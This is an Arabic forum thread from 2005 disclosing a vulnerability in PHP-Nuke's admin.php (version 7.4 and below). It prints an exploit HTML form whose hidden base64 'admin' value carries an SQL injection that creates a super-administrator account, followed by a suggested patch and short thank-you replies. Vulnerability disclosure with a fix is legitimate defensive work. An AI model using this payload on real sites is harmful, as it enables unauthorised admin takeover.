الرئيسية     | الشروط والقوانين  | سياسة الخصوصية | اتصل بنا | الأرشيف |  RSS
  

 

يمنع منعا باتا وضع موضوع إعلاني

 


العودة   منتدى الشبكة الكويتية > قســـــ تطوير المواقع ـــــــــم > تطوير المواقع

تطوير المواقع سكربتات :: واجهات :: برامج مواقع

 
أدوات الموضوع
  #1  
قديم 28-01-2005, 06:15 AM
الصورة الرمزية VIP
VIP VIP غير متصل

AdminiStrator

 





VIP كاتب مميزVIP كاتب مميزVIP كاتب مميزVIP كاتب مميز
ثغرة النيوك , مع سد الثغرة ...

ثغرة النيوك الجديده , مع الترقيع !
السلام عليكم ورحمة الله وبركاته



الثغرة في ملف : Admin.php

وهي عبارة عن استثمار .. لخطاء برمجي بالملف ,,

يمّكن المخترق من الحصول على حساب ادامن في مجلة النيوك ,,

الاصدارات المصابة : 7.4 وما تحتها من اصدارات ,

وهذا جزء من الكود الاستثماري للثغرة طبعا كود html:

كود:
NOME: 
    <input type="text" 
name="add_name"> 
    <br> 
    PASSWORD: 

    <input type="text" 
name="add_pwd"> 
    <br> 
    E-MAIL: 
    <input type="text" 
name="add_email"> 
    <br> 
    <input type="hidden" 
name="admin" 
value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> 
    <br> 
    <input type="hidden" 
name="add_radminsuper" value="1"> 
    <br> 
    <input type="hidden" 
name="op" 
value="AddAuthor"> 
  </p> 
  <p> 
    <input type="submit" 
name="Submit" 
value="Create 
Admin"> 
    <br> 
  </p> 
</form>
الترقيع الصحيح :

قم باضافة هذة السطور الى ملف admin.php

كود:
if ( !empty($HTTP_GET_VARS['op']) ) 
{ 
$op = $HTTP_GET_VARS['op']; 
} 

if ( !empty($HTTP_POST_VARS['op']) ) 
{ 
$op = $HTTP_POST_VARS['op']; 
}
مع التحية اخواني اصحاب المواقع

 

 

توقيع : VIP

ثغرة النيوك , مع سد الثغرة ...
قديم 29-01-2005, 08:37 AM   رقم المشاركة : 2
برق
عضو نشط
 
الصورة الرمزية برق





برق غير متصل

برق كاتب جديد


افتراضي

مشكور اخوي بصراحه معلومه مهمه لاصحاب المواقع المبتدئين







قديم 01-02-2005, 03:43 AM   رقم المشاركة : 3
VIP

AdminiStrator

 
الصورة الرمزية VIP






VIP غير متصل

VIP كاتب مميزVIP كاتب مميزVIP كاتب مميزVIP كاتب مميز


افتراضي

العفو طال عمرك







التوقيع

ثغرة النيوك , مع سد الثغرة ...
قديم 10-02-2005, 08:47 AM   رقم المشاركة : 4
برق
عضو نشط
 
الصورة الرمزية برق





برق غير متصل

برق كاتب جديد


افتراضي

مشكور اخوي على هل شرح الممتاز







مواضيع ذات صله تطوير المواقع

ثغرة النيوك , مع سد الثغرة ...



الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
دخول المنتدى فى مجله النيوك kwety تطوير المواقع 4 14-09-2006 12:52 AM
طريقة حماية ايميلك من الثغرة القاتلة الجديدة بالهوتميل . VIP منتدى الحماية و الهكرز 4 10-08-2006 02:47 PM
ثغرة قاتله في النيوك VIP تطوير المواقع 1 27-11-2005 09:31 PM
الثغرة متواجده في المراكز التحميل VIP قسم ثغرات النسخه الثالثه 0 09-10-2005 04:08 AM
تعلم كيف تعرب ثيم النيوك؟ VIP تطوير المواقع 0 19-01-2005 07:42 AM

الساعة الآن 01:24 AM
جميع الحقوق محفوظة لـ الشبكة الكويتية

التعليقات المنشورة لا تعبر عن رأي الشبكة الكويتية ولا نتحمل أي مسؤولية قانونية حيال ذلك ويتحمل كاتبها مسؤولية النشر

RSS RSS 2.0 XML MAP HTML